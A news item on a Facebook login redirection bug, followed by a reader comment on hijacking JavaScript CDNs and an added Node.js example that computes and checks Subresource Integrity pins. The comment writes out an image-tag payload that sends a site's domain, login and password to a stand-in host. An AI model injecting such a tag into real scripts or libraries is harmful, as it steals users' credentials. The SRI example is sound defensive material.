Facebook Breaks Major Websites With Redirection Bug
johnsnails writes "Some of the biggest news sites in the world disappeared yesterday when Facebook took over the internet with a redirection bug. Visitors to sites such as The Washington Post, BuzzFeed, the Gawker network, NBC News and News.com.au were immediately transferred to a Facebook error page upon loading their intended site. It was fixed quickly, and Facebook provided this statement: 'For a short period of time, there was a bug that redirected people logging in with Facebook from third party sites to Facebook.com. The issue was quickly resolved, and Login with Facebook is now working as usual.'"
I shudder thinking what havoc you could cause if you managed to hijack one of the big JS library CDNs.
For example, just imagine every copy of jQuery from Google's CDN also including instructions to add '<img src="http://buttfuck.me/lol?domain=$window.domain&login=$login&pass=$pass">' on clicking the login button - even if it'd be up for just a few minutes, you'd still probably get millions of user accounts sent to you.
The economic impact would be huge, with thousands of sites scouring logs and resetting compromised logins and users having to check and reset every password.
Only a tiny minority uses NoScript, and then some sites require scripts to function - so you should also use some tricks to replace them with locally cached versions. I really hope those CDN servers are in a secure location with write access only for verified personnel physically present on site.
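
The risk raised in the comment above, a CDN serving a modified copy of a shared library, is what Subresource Integrity (the `integrity` attribute on a script tag) pins against. The following is an added example, not part of the original thread: it computes the pin for a known-good file and shows a modified copy failing the check. The file contents, the `cdn.example` URL and the function names are constructed for illustration.

```javascript
const crypto = require('crypto');

// Strength order applied when an integrity attribute lists several algorithms.
const ALGOS = ['sha256', 'sha384', 'sha512'];

// Build the value for a <script integrity="..."> attribute from known-good bytes.
function sriFor(body, algo = 'sha384') {
  return `${algo}-${crypto.createHash(algo).update(body).digest('base64')}`;
}

// Parse an integrity attribute: whitespace-separated "algo-base64[?options]" tokens.
function parseIntegrity(attr) {
  return attr.trim().split(/\s+/).map((tok) => {
    const m = /^(sha256|sha384|sha512)-([A-Za-z0-9+/]+={0,2})(\?.*)?$/.exec(tok);
    return m ? { algo: m[1], digest: m[2] } : null;
  }).filter(Boolean);
}

// Verify fetched bytes against a pin, following the SRI rule that only the
// strongest listed algorithm counts, so a weaker hash cannot be used to downgrade.
function verify(body, attr) {
  const entries = parseIntegrity(attr);
  if (entries.length === 0) return false; // fail closed: an unparseable pin protects nothing
  const strongest = entries.reduce((best, e) =>
    (ALGOS.indexOf(e.algo) > ALGOS.indexOf(best) ? e.algo : best), entries[0].algo);
  const actual = crypto.createHash(strongest).update(body).digest('base64');
  return entries.some((e) => e.algo === strongest && e.digest === actual);
}

// Constructed sample: a known-good library body and a copy with one extra line.
const good = Buffer.from('function lib(){return 1;}\n');
const tampered = Buffer.from('function lib(){return 1;}\n/* injected line */\n');
const pin = sriFor(good);

function demo() {
  return {
    tag: `<script src="https://cdn.example/lib.js" integrity="${pin}" crossorigin="anonymous"></script>`,
    goodOk: verify(good, pin),
    tamperedOk: verify(tampered, pin),
    // A sha256 of the tampered file listed beside the sha384 pin must not pass.
    downgradeOk: verify(tampered, `${sriFor(tampered, 'sha256')} ${pin}`),
  };
}

console.log(demo());
```

The pin only helps when it is generated from a copy you have reviewed and the page that carries the tag is served from infrastructure you control.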